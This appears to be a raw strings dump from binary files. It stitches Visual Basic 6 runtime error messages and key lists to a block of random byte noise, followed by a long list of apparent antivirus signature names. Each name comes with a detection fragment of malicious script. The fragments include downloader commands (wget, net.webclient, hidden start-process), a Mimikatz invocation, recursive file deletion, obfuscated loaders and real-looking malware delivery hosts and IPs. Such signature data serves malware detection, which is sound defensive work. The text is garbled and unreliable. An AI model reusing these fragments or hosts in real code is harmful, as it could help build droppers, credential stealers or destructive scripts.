error2Printer driver does not support specified property_Problem getting printer information from the system. Make sure the printer is set up correctly. Invalid picture type.Can't print form image to this type of printer Can't print minimized form image8Top-level or invalid menu specified as PopupMenu default Could not lock the database#Could not access the desired Column Could not lock the database5The row has been deleted since the update was started+Unable to bind to field or DataMember: '|1'_Cannot bind this control to '|1'. Select a different datasource control (eg - Data1, or MSRDC1)eCannot bind this control to '|1'. Select a different datasource (eg - ADODC1, or DataEnvironment1...)XDataObject formats list may not be cleared or expanded outside of the OLEStartDrag event Expected at least one argument.6Recursive invocation of OLE drag and drop not allowed. Non-intrinsic OLE drag and drop formats used with SetData require Byte array data. GetData may return more bytes than were given to SetData.NRequested data was not supplied to the DataObject during the OLESetData event. Failure in AsyncReadRPropertyName parameter conflicts with the PropertyName of an AsyncRead in progress/Can't find or load the required file urlmon.dll Unable to complete navigation?Can't get Picture from AsyncRead until the download is complete5An unknown protocol was specified in Target parameter_Unable to find target specified in Target parameter of the AsyncRead that started this downloadkUnable to find or download target specified in Target parameter of the AsyncRead that started this downloadGClass of object cannot be determined. Looking for object with CLSID: |18Invalid class string. Looking for object with ProgID: |1;Object is not registered. Looking for object with CLSID: |1 Class not registered. |1;Interface not registered. Looking for object with CLSID: |18Application not found. Looking for object with CLSID: |1:DLL for class not found. Looking for object with CLSID: |13Error in the DLL. Looking for object with CLSID: |1IWrong OS or OS version for application. Looking for object with CLSID: |1bApplication was launched but it didn't register a class factory. Looking for object with CLSID: |1 '|1' is not a valid control type%'|1' is not a valid control container[Can't have child controls capable of receiving focus on a control that cannot receive focusjThe OLE client control and OLE embeddings are not allowed on UserControls, UserDocuments, or PropertyPages;Can't have windowed child controls on a windowless control. |1 is a single-threaded component and cannot be used in multi-threaded projects. Change the threading model for |2 or contact the component vendor for an updated version.^Control '|1' does not have the align property, so it cannot be placed directly on the MDI form-There is already a control with the name '|1'DControl container for Controls.Add cannot be a design time instance.ECannot add control while Control container is loading other controls.* Information necessary for the EventInfo object was not included with the control raising the event. Private UserControls require extra data to be included during compilation to support the ObjectEvent. To correct this uncheck 'Remove information about unused ActiveX Controls' in Project Options. No design-time license information found for control '|1'. Contact the vendor for control '|1' to obtain a design-time license. Out of memory Can't open Clipboard\tNo object Unable to close object Can't paste Invalid property value Can't copy Invalid format Class is not set Source Document is not set Invalid Action Invalid or unknown Class Unable to create link Source name is too long Unable to activate object Object not running Dialog already in use Invalid source for link Unable to create embedded object Unable to fetch Link source name Invalid Verb index Incorrect Clipboard format Error saving to file Error loading from file Unable to access source document?You cannot set DisplayType while the control contains an object\\Cannot create embedded object. 'OleTypeAllowed' property of '|1' control is set to 'Linked'. Cannot quit. Save File As.Unexpected critical error: can't start program Out of Memory\\0 - User 1 - Twip 2 - Point 3 - Pixel 4 - Character 5 - Inch 6 - Millimeter 7 - Centimeter (None) Ctrl+A Ctrl+B Ctrl+C Ctrl+D Ctrl+E Ctrl+F Ctrl+G Ctrl+H Ctrl+I Ctrl+J Ctrl+K Ctrl+L Ctrl+M Ctrl+N Ctrl+O Ctrl+P Ctrl+Q Ctrl+R Ctrl+S Ctrl+T Ctrl+U Ctrl+V Ctrl+W Ctrl+X Ctrl+Y Ctrl+Z Ctrl+F1 Ctrl+F2 Ctrl+F3 Ctrl+F4 Ctrl+F5 Ctrl+F6 Ctrl+F7 Ctrl+F8 Ctrl+F9 Ctrl+F11 Ctrl+F12 Shift+F1 Shift+F2 Shift+F3 Shift+F4 Shift+F5 Shift+F6 Shift+F7 Shift+F8 Shift+F9 Shift+F11 Shift+F12 Shift+Ctrl+F1 ^^dShift+Ctrl+F2 Shift+Ctrl+F3 Shift+Ctrl+F4 Shift+Ctrl+F5 Shift+Ctrl+F6 Shift+Ctrl+F7 Shift+Ctrl+F8 ^^VShift+Ctrl+F9 Shift+Ctrl+F11 Shift+Ctrl+F12 Ctrl+Ins Shift+Ins Shift+Del Alt+Bksp All Files (*.*) Access Access 2000; dBASE III; dBASE IV; dBASE 5.0; Excel 3.0; Excel 4.0; Excel 5.0; Excel 8.0; FoxPro 2.0; FoxPro 2.5; FoxPro 2.6; FoxPro 3.0; Lotus WK1; Lotus WK3; Lotus WK4; Paradox 3.x; Paradox 4.x; Paradox 5.x; Text; Looking for object with CLSID: P&roperties Not Available E&dit &Help<You need the following file to be installed on your machine. TypeInfo mismatch within.Please verify the file is the correct version. Return without GoSub\"Invalid procedure call or argument Overflow Subscript out of range)This array is fixed or temporarily locked Division by zero Type mismatch Out of string space Expression too complex!Can't perform requested operation User interrupt occurred Resume without error Out of stack space Sub or Function not defined Too many DLL application clients Error in loading DLL Bad DLL calling convention Internal error Bad file name or number File not found Bad file mode File already open Device I/O error File already exists Bad record length\tDisk full Input past end of file Bad record number Too many files Device unavailable Permission denied Disk not ready!Can't rename with different drive Path/File access error Path not found.Object variable or With block variable not set For loop not initialized Invalid pattern string Invalid use of Null+Application-defined or object-defined error Unable to sink events of object because the object is already firing events to the maximum number of event receivers that it supportsQCan not call friend function on object which is not an instance of defining classtA property or method call cannot include a reference to a private object, either as an argument or as a return value Invalid file format%Can't create necessary temporary file Invalid format in resource file Invalid property array index Set not supported at runtime&Set not supported (read-only property) Need property array index Set not permitted Get not supported at runtime'Get not supported (write-only property) Property not found Property or method not found Object required%ActiveX component can't create objectHClass does not support Automation or does not support expected interface=File name or class name not found during Automation operation.Object doesn't support this property or method Automation errorwConnection to type library or object library for remote process has been lost. Press OK for dialog to remove reference./Automation object does not have a default value\"Object doesn't support this action&Object doesn't support named arguments-Object doesn't support current locale setting Named argument not found Argument not optional8Wrong number of arguments or invalid pr z7&pM; rfLu9 IO+HG C[Gq) &9/E 4uhPo$ `;h=G j\tLIX #oDHN B R<Mks eDSk\t hRa\t{U cj+0 ud\\V`) }1pgy5\t bLc&e y<5&Jz +[DRO2 7k$?<p l>$PC8= :he1uY Q<FT?,, GD4Gs %-61cy7xz ]]hDD XP!KU3nM e23ox9aC JZ)&| 0% Vm^ $4#f}8(% Q668{ Uy2!Y LdXn= mW]6c b6v9hO ++9}?r ]r\\/QD b<1\t. 0mUO, \t@Y*, PSdV4 GV *q |qmi7 &sbq^ 6\tEN* HQB `fi Ocj~a TKz l =^O>Y \"9 f\"Z {0B7Z 6azU] +EBU` IQ vu]>P3% X/04A =m4)| t$9Skp \\;9E5 0lBnE 0;:HMa, gfi2_ )@\t~~z j%C*! 5\\\\J{.;Q (oGf ]E root\\default:system_anti_virus_core %root\\default:system_anti_virus_core !#Trojan:Win32/Nanocore.FA3!MTB \"),binarytostring(\"0x %\"),binarytostring(\"0x 02e626174\")) !#BRUTE:SCHTSK:Expert:Feature:10 )O !#BRUTE:SCHTSK:Expert:Feature:10 <multipleinstancespolicy>ignorenew $<multipleinstancespolicy>ignorenew !#BRUTE:SCHTSK:Expert:Feature:45 )O !#BRUTE:SCHTSK:Expert:Feature:45 !#SCPT:Trojan:HTML/Phish.ST2!MTB )O !#SCPT:Trojan:HTML/Phish.ST2!MTB =\"submit\"value=\"continuetodownload $=\"submit\"value=\"continuetodownload !#SCPT:Trojan:JS/Obfuse.Pra3!MTB )O !#SCPT:Trojan:JS/Obfuse.Pra3!MTB $.type=1; !#SCPT:Trojan:JS/Obfuse.RVB1!MTB )O !#SCPT:Trojan:JS/Obfuse.RVB1!MTB $.replace(newregexp(\" \",\"g\"),\"a\") !#SCPT:Trojan:Python/Queri.C.EC2 )O !#SCPT:Trojan:Python/Queri.C.EC2 configpath=url+'/config.json?'+cid $configpath=url+'/config.json?'+cid !#SCPT:TrojanProxy:JS/Banker.AP1 )O !#SCPT:TrojanProxy:JS/Banker.AP1 \"pr\",\"oxy\",\"ww\",\"c\",\"o\",\"m\",\"b\",\"r $\"pr\",\"oxy\",\"ww\",\"c\",\"o\",\"m\",\"b\",\"r !#SCRIPT:PowerShell/Poisonweb.B2 )O !#SCRIPT:PowerShell/Poisonweb.B2 =icacls\" $=icacls\" \"|findstr/v\"processing\" !#SCRIPT:Ransom:HTML/Tescrypt.D1 )O !#SCRIPT:Ransom:HTML/Tescrypt.D1 thenwesuggestyou<!- $thenwesuggestyou<!- ->donotwaste )O !#SCRIPT:Trojan:BAT/Qhost.AF_etc =%belayagoryachka%%df2%c%som%omset $=%belayagoryachka%%df2%c%som%omset =%clenchchettraha%%df2%c%som%omset $=%clenchchettraha%%df2%c%som%omset =\\s%olololoshenka_2222222222%ysset $=\\s%olololoshenka_2222222222%ysset =tem%ne_dolgo_tak_ebalis%32\\driset $=tem%ne_dolgo_tak_ebalis%32\\driset !#Script:Phish:PHP/PassPlace!MTB )O !#Script:Phish:PHP/PassPlace!MTB <inputtype=\"password\"placeholder=\" $<inputtype=\"password\"placeholder=\" !#Trojan:HTML/Redirector.C!atb01 )O !#Trojan:HTML/Redirector.C!atb01 imgsrc=\"https://2no.co/1spk97.gif\" $imgsrc=\"https://2no.co/1spk97.gif\" !!#Exploit:O97M/DDEDownloader2!MTB )O!!#Exploit:O97M/DDEDownloader2!MTB http://screw-malwrhunterteam.com/ #http://screw-malwrhunterteam.com/ !!#SCPT:HackTool:VBA/CreateShell.A )O!!#SCPT:HackTool:VBA/CreateShell.A createobject(\"shell.application\") #createobject(\"shell.application\") !!#SCPT:Trojan:HTML/Phish.SMA1!MTB )O!!#SCPT:Trojan:HTML/Phish.SMA1!MTB <script>varplod=atob(\"ahr0chm6ly9 #<script>varplod=atob(\"ahr0chm6ly9 !!#SCPT:Trojan:HTML/Redirector.CS1 )O!!#SCPT:Trojan:HTML/Redirector.CS1 scriptsrc=\"http://nt010.cn/e/j.js #scriptsrc=\"http://nt010.cn/e/j.js !!#SCPT:Trojan:JS/Magecart.YA2!MTB )O!!#SCPT:Trojan:JS/Magecart.YA2!MTB #return$ .gate+\"?hash=\"+encoded; !!#SCPT:Trojan:JS/Obfuse.RVBB5!MTB )O!!#SCPT:Trojan:JS/Obfuse.RVBB5!MTB bname=bname+\"vb\";bname=bname+\"s\"; #bname=bname+\"vb\";bname=bname+\"s\"; !!#SCPT:Trojan:Linux/CoinMiner.JJ4 )O!!#SCPT:Trojan:Linux/CoinMiner.JJ4 wget-qhttp:// #wget-qhttp:// /$myfile-o$mydir/ !!#SCRIPT:PowerShell/Macroburst.O4 )O!!#SCRIPT:PowerShell/Macroburst.O4 https://\"+ #https://\"+ +\"?restype=container !!#SCRIPT:Win32/AutoitTrayIconHide )O!!#SCRIPT:Win32/AutoitTrayIconHide autoitsetoption(\"trayiconhide\",1) #autoitsetoption(\"trayiconhide\",1) )O\"!#ALF:HackTool:Script/Nosogo.A!dha read_armed_file:readthegivenfile \"read_armed_file:readthegivenfile \"!#ALF:SCPT:TrojanDropper:JS/Donoff )O\"!#ALF:SCPT:TrojanDropper:JS/Donoff ({cname:\" \"({cname:\" .docm\",nlaunch: \"!#ASRWmiEventSubscriptionExclusion )O\"!#ASRWmiEventSubscriptionExclusion hpusb-c&auniversaldockg2consumer \"hpusb-c&auniversaldockg2consumer \"!#Lowfi:TrojanDownloader:Nemucod.H )O\"!#Lowfi:TrojanDownloader:Nemucod.H \".run( ,0,0)};}catch(er){};}dl( \"!#SCPT:BrowserModifier:Win32/Eazel )O\"!#SCPT:BrowserModifier:Win32/Eazel iexplore.exehttp://en.eazel.com/ \"iexplore.exehttp://en.eazel.com/ \"!#SCPT:CVE-2021-27065.B.ConfigStrB )O\"!#SCPT:CVE-2021-27065.B.ConfigStrB extendedprotectiontokenchecking: \"extendedprotectiontokenchecking: \"!#SCPT:Exploit:Win32/ShellCode.Y.1 )O\"!#SCPT:Exploit:Win32/ShellCode.Y.1 \"49803408 0-9a-f85c975f7ffe0e8 )O\"!#SCPT:JS/Obfuscator.Split.MSXML.A \"m\"+\" x\"+\"m \"x\"+\"m \"!#SCPT:Linux/Coinminer.downloadyam )O\"!#SCPT:Linux/Coinminer.downloadyam while[1]do \"while[1]do 0downloadyam 0sleep \"!#SCPT:SchedulerInvokeMacro.E!amsi )O\"!#SCPT:SchedulerInvokeMacro.E!amsi itaskdefinition.registrationinfo \"itaskdefinition.registrationinfo \"!#SCPT:Trojan:Win32/Powbit.YC2!MTB )O\"!#SCPT:Trojan:Win32/Powbit.YC2!MTB start-process-windowstylehidden$ \"start-process-windowstylehidden$ \"!#SCPT:TrojanDropper:JS/Binzie.A!B )O\"!#SCPT:TrojanDropper:JS/Binzie.A!B ;eval(function(){for(var_0x \";eval(function(){for(var_0x \"!#SCRIPT:PowerShell/Internaloff.B3 )O\"!#SCRIPT:PowerShell/Internaloff.B3 =[console]::treatcontrolcasinput \"=[console]::treatcontrolcasinput \"!#SCRIPT:PowerShell/Internaloff.P2 )O\"!#SCRIPT:PowerShell/Internaloff.P2 =(new-guid).tostring().toupper() \"=(new-guid).tostring().toupper() \"!#SCRIPT:Trojan:JS/BlacoleRef.CW.1 )O\"!#SCRIPT:Trojan:JS/BlacoleRef.CW.1 (p(a[\"su \"(p(a[\"su \"](i,2),27)+ ]((p(s.substr(i,2),26)+ \"]((p(s.substr(i,2),26)+ \"!#Script:Trojan:JS/Kryptik.AD!MTB2 )O\"!#Script:Trojan:JS/Kryptik.AD!MTB2 for(vari=24;i< \"for(vari=24;i< .length-2;i+=2) #!#ALF:SoftwareBundler:Xiazai:Config )O#!#ALF:SoftwareBundler:Xiazai:Config iesp=http://hao.360.cn/?src=lm& !iesp=http://hao.360.cn/?src=lm& #!#BRUTE:Exploit:VBS/CVE-2014-6332-2 )O#!#BRUTE:Exploit:VBS/CVE-2014-6332-2 =1.69759663316747e-313 !=1.69759663316747e-313 =lenb( #!#SCPT:CodeOnly.UseMojoJsBindings.A )O#!#SCPT:CodeOnly.UseMojoJsBindings.A mojo.bindinterface(blink.mojom. !mojo.bindinterface(blink.mojom. #!#SCPT:Program:JS/InjectorPlugin.3b )O#!#SCPT:Program:JS/InjectorPlugin.3b (document.body||document.head). !(document.body||document.head). #!#SCPT:Script/FileTypeMacro.A!Rttr8 )O#!#SCPT:Script/FileTypeMacro.A!Rttr8 socialhistory.docx.manifest.xml !socialhistory.docx.manifest.xml #!#SCPT:TrojanDownloader:JS/Tnega.M4 )O#!#SCPT:TrojanDownloader:JS/Tnega.M4 .dq.getexecutor().exec( !.dq.getexecutor().exec( #!#SCPT:VBS/Obfuscator.Split.Adodb.A )O#!#SCPT:VBS/Obfuscator.Split.Adodb.A createobject(\"adodb.s\"+\"tream\") !createobject(\"adodb.s\"+\"tream\") createobject(\"adodb.st\"+\"ream\") !createobject(\"adodb.st\"+\"ream\") #!#SCPT:XML/FriendlyAssemblyIdentity )O#!#SCPT:XML/FriendlyAssemblyIdentity assemblyidentityname=\"microsoft !assemblyidentityname=\"microsoft #!#SCRIPT:Exploit:JS/CVE-2013-2551-2 )O#!#SCRIPT:Exploit:JS/CVE-2013-2551-2 v\\:*{behavior:url(#default#vml) !v\\:*{behavior:url(#default#vml) #!#SCRIPT:Exploit:Win32/Pdfjsc.AGS.1 )O#!#SCRIPT:Exploit:Win32/Pdfjsc.AGS.1 +\"#\"+\"\"+\":\"+\"\"+ !+\"#\"+\"\"+\":\"+\"\"+ 0getfield(\" #!#TrojanDownloader:O97M/Slinjek.MR2 )O#!#TrojanDownloader:O97M/Slinjek.MR2 set/p=\"\"iexec/ihttp^:^/^/^linux !set/p=\"\"iexec/ihttp^:^/^/^linux )O#!#TrojanDownloader:Win32/Lnkget.gen !echo $!#SCPT:AutoItMacro_ProgramsCommonDir )O$!#SCPT:AutoItMacro_ProgramsCommonDir @programscommondir @programscommondir $!#SCPT:AutoItMacro_SW_SHOWNOACTIVATE )O$!#SCPT:AutoItMacro_SW_SHOWNOACTIVATE @sw_shownoactivate @sw_shownoactivate $!#SCPT:Backdoor:PHP/Webshell.T!al013 )O$!#SCPT:Backdoor:PHP/Webshell.T!al013 $word.selection.insertformula( $word.selection.insertformula( $!#SCPT:Obfuscator.LongVarNameInFor.A )O$!#SCPT:Obfuscator.LongVarNameInFor.A for(var a-z0-9=0; $!#SCPT:SchTaskAdministratorAccntPriv )O$!#SCPT:SchTaskAdministratorAccntPriv <userid>s-1-5- <userid>s-1-5- 0-500</userid> $!#SCPT:Trojan:JS/WmiCreateWmic.B!ams )O$!#SCPT:Trojan:JS/WmiCreateWmic.B!ams setpropvalue.commandline(\"wmic setpropvalue.commandline(\"wmic $!#SCPT:Trojan:O97M/CVE-2017-8570.JR3 )O$!#SCPT:Trojan:O97M/CVE-2017-8570.JR3 execute(\" execute(\" \"\"/bject(\"\"-sxml2d $!#SCRIPT:JS/PowershellBinaryString.C )O$!#SCRIPT:JS/PowershellBinaryString.C 73746172742d70726f636573732024 73746172742d70726f636573732024 $!#SCRIPT:TrojanDownloader:JS/Adodb.1 )O$!#SCRIPT:TrojanDownloader:JS/Adodb.1 \"msxml2.xmlhttp \"msxml2.xmlhttp `adodb.stream $!#SCRIPT:TrojanDownloader:JS/Rusem.1 )O$!#SCRIPT:TrojanDownloader:JS/Rusem.1 /russmebelspb.com/index_files/ /russmebelspb.com/index_files/ $!#Script:Trojan:JS/SpelevoEK.AD!MTB9 )O$!#Script:Trojan:JS/SpelevoEK.AD!MTB9 if((true)&&(checkversionflash( if((true)&&(checkversionflash( $!#TEL:Backdoor:PHP/WebShell.FileAttr )O$!#TEL:Backdoor:PHP/WebShell.FileAttr $perms.=($mode&00400)?'r':'-'; $perms.=($mode&00400)?'r':'-'; %!#Exploit:O97M/CVE-2017-11882.AQ!ats1 )O%!#Exploit:O97M/CVE-2017-11882.AQ!ats1 aeppedaetae%\\emsebueiled.eexe %!#SCPT:CodeOnly.FindMsvcrtWithJscript )O%!#SCPT:CodeOnly.FindMsvcrtWithJscript (jscript %!#SCPT:Exploit:O97M/CVE-2017-0199.RX1 )O%!#SCPT:Exploit:O97M/CVE-2017-0199.RX1 http://a.pomf.cat/zjiqnx.html %!#SCPT:Exploit:O97M/CVE-2017-8570.HZ3 )O%!#SCPT:Exploit:O97M/CVE-2017-8570.HZ3 execute(\"base\"\"64encodetext\") %!#SCPT:Phish:PHP/Loc_Href_Pwd_html.GG )O%!#SCPT:Phish:PHP/Loc_Href_Pwd_html.GG location.href= password.htm %!#SCPT:Phish:PHP/PhishKitBlock.B3!MTB )O%!#SCPT:Phish:PHP/PhishKitBlock.B3!MTB rewritecond%{http_user_agent} %!#SCPT:Trojan:Linux/CoinMiner.AO2!MTB )O%!#SCPT:Trojan:Linux/CoinMiner.AO2!MTB //py2web.store/ /newinit.sh %!#SCPT:Trojan:PowerShell/Keystrokes.F )O%!#SCPT:Trojan:PowerShell/Keystrokes.F powershell.addscript($script) %!#SCPT:TrojanClicker:JS/Faceliker.AM1 )O%!#SCPT:TrojanClicker:JS/Faceliker.AM1 http://muahangvn.blogspot.com %!#SCRIPT:Exploit:JS/Phisims.B!lowfi-4 )O%!#SCRIPT:Exploit:JS/Phisims.B!lowfi-4 /themes/resources/lgnbotl.gif %!#SCRIPT:Java/CVE-2012-0507!ObfusStr2 )O%!#SCRIPT:Java/CVE-2012-0507!ObfusStr2 [zkmunpack] 616e672e4f626a %!#TrojanDownloader:AutoIt/Povertel.G4 )O%!#TrojanDownloader:AutoIt/Povertel.G4 #onautoitstartregister\"\" %!#TrojanDownloader:BAT/Pterodo.F!Pra2 )O%!#TrojanDownloader:BAT/Pterodo.F!Pra2 http://device-update.ddns.net &!#Exploit:O97M/CVE-2017-11882.AB!atob2 )O&!#Exploit:O97M/CVE-2017-11882.AB!atob2 47657450726f6341646472657373 &!#SCPT:Ransom:PowerShell/MalScript!sy2 )O&!#SCPT:Ransom:PowerShell/MalScript!sy2 remove-item -force-recurse &!#SCPT:Trojan:PowerShell/Browserdata.C )O&!#SCPT:Trojan:PowerShell/Browserdata.C ($browser-contains'firefox') &!#SCPT:TrojanDownloader:BAT/Selmito.A1 )O&!#SCPT:TrojanDownloader:BAT/Selmito.A1 %strfileurl=\"http P.zip\">>% &!#SCPT:TrojanDownloader:JS/Banload.Z01 )O&!#SCPT:TrojanDownloader:JS/Banload.Z01 compilervar= +\"\\\\7za.\"+ &!#SCPT:TrojanDownloader:JS/Nemucod.HY2 )O&!#SCPT:TrojanDownloader:JS/Nemucod.HY2 maze.shuffle=function(array) &!#SCPT:TrojanDownloader:JS/Nemucod.JV5 )O&!#SCPT:TrojanDownloader:JS/Nemucod.JV5 92e73706c69636528206161752c2 &!#SCPT:TrojanDownloader:JS/Nemucod.JV9 )O&!#SCPT:TrojanDownloader:JS/Nemucod.JV9 4c2e70687022205d3b0a0a66756e &!#SCPT:TrojanDownloader:JS/Nemucod.SH2 )O&!#SCPT:TrojanDownloader:JS/Nemucod.SH2 .split(regexp( )).join(\"\") &!#SCPT:TrojanDownloader:JS/Nemucod.SJ1 )O&!#SCPT:TrojanDownloader:JS/Nemucod.SJ1 \\x2e\\x7a\\x69\\x70\",\"\\x5c\",\"\\x &!#SCPT:TrojanDownloader:JS/Nemucod:Z03 )O&!#SCPT:TrojanDownloader:JS/Nemucod:Z03 (){returnundefined;}function &!#SCPT:TrojanDownloader:VBS/Obfuse.TR1 )O&!#SCPT:TrojanDownloader:VBS/Obfuse.TR1 \"):loop &!#SCRIPT:PowerShell/Compress-Archive.B )O&!#SCRIPT:PowerShell/Compress-Archive.B compress-archive-literalpath &!#SCRIPT:PowerShell/WindowsCredentials )O&!#SCRIPT:PowerShell/WindowsCredentials windows.security.credentials &!#TrojanDownloader:JS/Donvibs.EE!atb03 )O&!#TrojanDownloader:JS/Donvibs.EE!atb03 ('0x0', &!#TrojanDownloader:Linux/Coinminer.AA3 )O&!#TrojanDownloader:Linux/Coinminer.AA3 thenecho\"detectedryzen\"wrmsr &!#TrojanDownloader:O97M/Obfuse.SK8!MTB )O&!#TrojanDownloader:O97M/Obfuse.SK8!MTB if(fso.fileexists(path))then &!#TrojanDownloader:Win32/PowerShell.A1 )O&!#TrojanDownloader:Win32/PowerShell.A1 vgbpahiadab1ageababcag8aeaa= '!#//SCPT:TrojanSpy:AndroidOS/DmsSpy.BB2 )O'!#//SCPT:TrojanSpy:AndroidOS/DmsSpy.BB2 applicationcom.stub.stubapp '!#SCPT:Trojan:PHP/PwRevWebshell.YA1!MTB )O'!#SCPT:Trojan:PHP/PwRevWebshell.YA1!MTB parametersetname=\"reverse\") '!#SCPT:Trojan:PowerShell/DllInjection.E )O'!#SCPT:Trojan:PowerShell/DllInjection.E writeprocessmemory.invoke($ '!#SCPT:TrojanDownloader:JS/Nemucod.echo )O'!#SCPT:TrojanDownloader:JS/Nemucod.echo =\"echo==\\\"unknown\\\"\";return '!#SCPT:TrojanDownloader:O97M/Powdow.SX1 )O'!#SCPT:TrojanDownloader:O97M/Powdow.SX1 continue\"=\"silentlycontinue '!#SCPT:TrojanDownloader:VBS/Banload.BL1 )O'!#SCPT:TrojanDownloader:VBS/Banload.BL1 vailabuscarmod2,aondeficar+ '!#SCRIPT:Exploit:Win32/CVE-2012-4792-A4 )O'!#SCRIPT:Exploit:Win32/CVE-2012-4792-A4 <t:animatecolorid=\"myanim\"/ '!#SCRIPT:PowerShell/AddTypedotnet.A!MTB )O'!#SCRIPT:PowerShell/AddTypedotnet.A!MTB (\"http '!#SCRIPT:TrojanClicker:JS/FaceLiker.C-3 )O'!#SCRIPT:TrojanClicker:JS/FaceLiker.C-3 .style.top=(window.event.y- '!#TrojanDownloader:O97M/MalSpam.F!ats01 )O'!#TrojanDownloader:O97M/MalSpam.F!ats01 cmd/cc^m^d;;/v^;/c\";(((^set )O(!#ALF:Script:SingleKeyXorDataArray.ST004 224,8,8,8,8, @,93,129,237 225,9,9,9,9, @,92,128,236 233,1,1,1,1, @,84,136,228 234,2,2,2,2, @,87,139,231 235,3,3,3,3, @,86,138,230 236,4,4,4,4, @,81,141,225 237,5,5,5,5, @,80,140,224 238,6,6,6,6, @,83,143,227 239,7,7,7,7, @,82,142,226 (!#ALF:TrojanDownloader:O97M/Qakbot.scpt2 )O(!#ALF:TrojanDownloader:O97M/Qakbot.scpt2 c:/users/public (!#ALF:TrojanDownloader:O97M/Sheemdro.STA )O(!#ALF:TrojanDownloader:O97M/Sheemdro.STA concatenate( nload (!#SCPT:JS/Obfuscator.parseInt.WiseLoop.A )O(!#SCPT:JS/Obfuscator.parseInt.WiseLoop.A parseint( 0o,16); (!#SCPT:Trojan:JS/IframeRef!redirector_03 )O(!#SCPT:Trojan:JS/IframeRef!redirector_03 <framesrc=\"http:// ?epl= (!#SCPT:TrojanDownloader:JS/Nemucod.ABM.1 )O(!#SCPT:TrojanDownloader:JS/Nemucod.ABM.1 ('41444f44422e53747265616d (!#SCPT:TrojanDownloader:JS/Nemucod.ABM.2 )O(!#SCPT:TrojanDownloader:JS/Nemucod.ABM.2 ['526573706f6e7365426f6479 (!#SCPT:TrojanDownloader:O97M/EncDoc.BRV5 )O(!#SCPT:TrojanDownloader:O97M/EncDoc.BRV5 <f>\"185.159.82.90/p1.\"</f> (!#SCPT:TrojanDownloader:VBS/Nemucod.BKP4 )O(!#SCPT:TrojanDownloader:VBS/Nemucod.BKP4 =right(tmi5hj38670,rh3379) )!#HackTool:PowerShell/Mikatz.Invoke!Lowfi )O)!#HackTool:PowerShell/Mikatz.Invoke!Lowfi functioninvoke-mimidogz{< functioninvoke-mimikatz{< )!#SCPT:AutoItApi_GUICtrlCreateContextMenu )O)!#SCPT:AutoItApi_GUICtrlCreateContextMenu guictrlcreatecontextmenu( )!#SCPT:TrojanDownloader:O97M/EncDoc.BKIR4 )O)!#SCPT:TrojanDownloader:O97M/EncDoc.BKIR4 <t>\"..\\cvbnxzcv.dll\")</t> )!#SCPT:TrojanDownloader:O97M/Powdow.BQD10 )O)!#SCPT:TrojanDownloader:O97M/Powdow.BQD10 $env:temp+'\\xlczo.exe')\") )!#SCRIPT:SoftwareBundler:Win32/Somoto.A-3 )O)!#SCRIPT:SoftwareBundler:Win32/Somoto.A-3 bitool::getoptionparamint )!#Script:Trojan:JS/NemuKryptikDow.AD!MTB1 )O)!#Script:Trojan:JS/NemuKryptikDow.AD!MTB1 \".replace(reg.eep,\" *!#SCPT:Exploit:O97M/CVE-2017-11882.AD1!MTB )O*!#SCPT:Exploit:O97M/CVE-2017-11882.AD1!MTB subject:fwd:fyiswiftcopy *!#SCPT:TrojanDownloader:JS/Nemucod.SS5!MTB )O*!#SCPT:TrojanDownloader:JS/Nemucod.SS5!MTB *!#SCPT:TrojanDownloader:JS/Nemucod.wscript )O*!#SCPT:TrojanDownloader:JS/Nemucod.wscript =\"typeofwscript.\";return *!#SCPT:TrojanDownloader:O97M/Encdoc.27!MTB )O*!#SCPT:TrojanDownloader:O97M/Encdoc.27!MTB -o%appdata%\\ \t.exe\")</f *!#SCPT:TrojanDownloader:VBS/Houndini.D!lw1 )O*!#SCPT:TrojanDownloader:VBS/Houndini.D!lw1 window.moveto-5000,-5000 *!#TrojanDownloader:O97M/Donoff.D!ams!atb01 )O*!#TrojanDownloader:O97M/Donoff.D!ams!atb01 =new-objectnet.webclient +!#SCPT:Exploit:O97M/CVE-2017-11882.AZD3!MTB )O+!#SCPT:Exploit:O97M/CVE-2017-11882.AZD3!MTB {{{\\m \\bin000 +!#SCPT:HackTool:PowerShell/InvokeSMBClient3 )O+!#SCPT:HackTool:PowerShell/InvokeSMBClient3 [0..15] [\"signature\"] +!#SCPT:TrojanDownloader:O97M/EncDoc.SI2!MTB )O+!#SCPT:TrojanDownloader:O97M/EncDoc.SI2!MTB jjccjj %dtruh 5zipfld +!#SCPT:TrojanDownloader:PowerShell/Tnega.PC )O+!#SCPT:TrojanDownloader:PowerShell/Tnega.PC $_.name-ne\"[kthreaddi]\" ,!#SCPT:Exploit:O97M/CVE-2017-11882.PAYF3!MTB )O,!#SCPT:Exploit:O97M/CVE-2017-11882.PAYF3!MTB \\bin00 ,!#SCPT:Exploit:O97M/CVE-2017-8570.JA!MTB!JA2 )O,!#SCPT:Exploit:O97M/CVE-2017-8570.JA!MTB!JA2 execute(\"objfile\"varwr ,!#SCPT:Phish:PHP/Referral_Spam_detect_Php.GG )O,!#SCPT:Phish:PHP/Referral_Spam_detect_Php.GG referralspamdetect.php ,!#SCPT:TrojanDownloader:JS/Powdow.PKDXR1!MTB )O,!#SCPT:TrojanDownloader:JS/Powdow.PKDXR1!MTB ,!#SCPT:TrojanDownloader:O97M/EncDoc.DRF1!MTB )O,!#SCPT:TrojanDownloader:O97M/EncDoc.DRF1!MTB ,!#SCPT:TrojanDownloader:O97M/IcedID.PVK1!MTB )O,!#SCPT:TrojanDownloader:O97M/IcedID.PVK1!MTB demetris9127f.com/xyz. ,!#SCPT:TrojanDownloader:O97M/IcedId.DRI1!MTB )O,!#SCPT:TrojanDownloader:O97M/IcedId.DRI1!MTB countblank(v201:v224)= ,!#SCPT:TrojanDownloader:O97M/IcedId.RVH3!MTB )O,!#SCPT:TrojanDownloader:O97M/IcedId.RVH3!MTB herty</t></si><si><t>a ,!#SCPT:TrojanDownloader:VBS/Obfuse.XGPK5!MTB )O,!#SCPT:TrojanDownloader:VBS/Obfuse.XGPK5!MTB -join'')|&('i'+'ex');\" -!#ALF:SCPT:Exploit:Win32/ASLR_Bypass_otkloadr )O-!#ALF:SCPT:Exploit:Win32/ASLR_Bypass_otkloadr otkloadr.wrassembly.1 -!#SCPT:BrowserModifier:Win32/Ruckenlinky!blnk )O-!#SCPT:BrowserModifier:Win32/Ruckenlinky!blnk centurylink.net/?cid= -!#SCPT:Exploit:Win32/CVE-2011-0035-cellchange )O-!#SCPT:Exploit:Win32/CVE-2011-0035-cellchange oncellchange=\" )O-!#SCPT:JS/Obfuscator.Redundancy.EmptyQuotes.C ].concat(\"\"+ =\"\"+\" -!#SCPT:TrojanDownloader:O97M/Obfuse.PKRE5!MTB 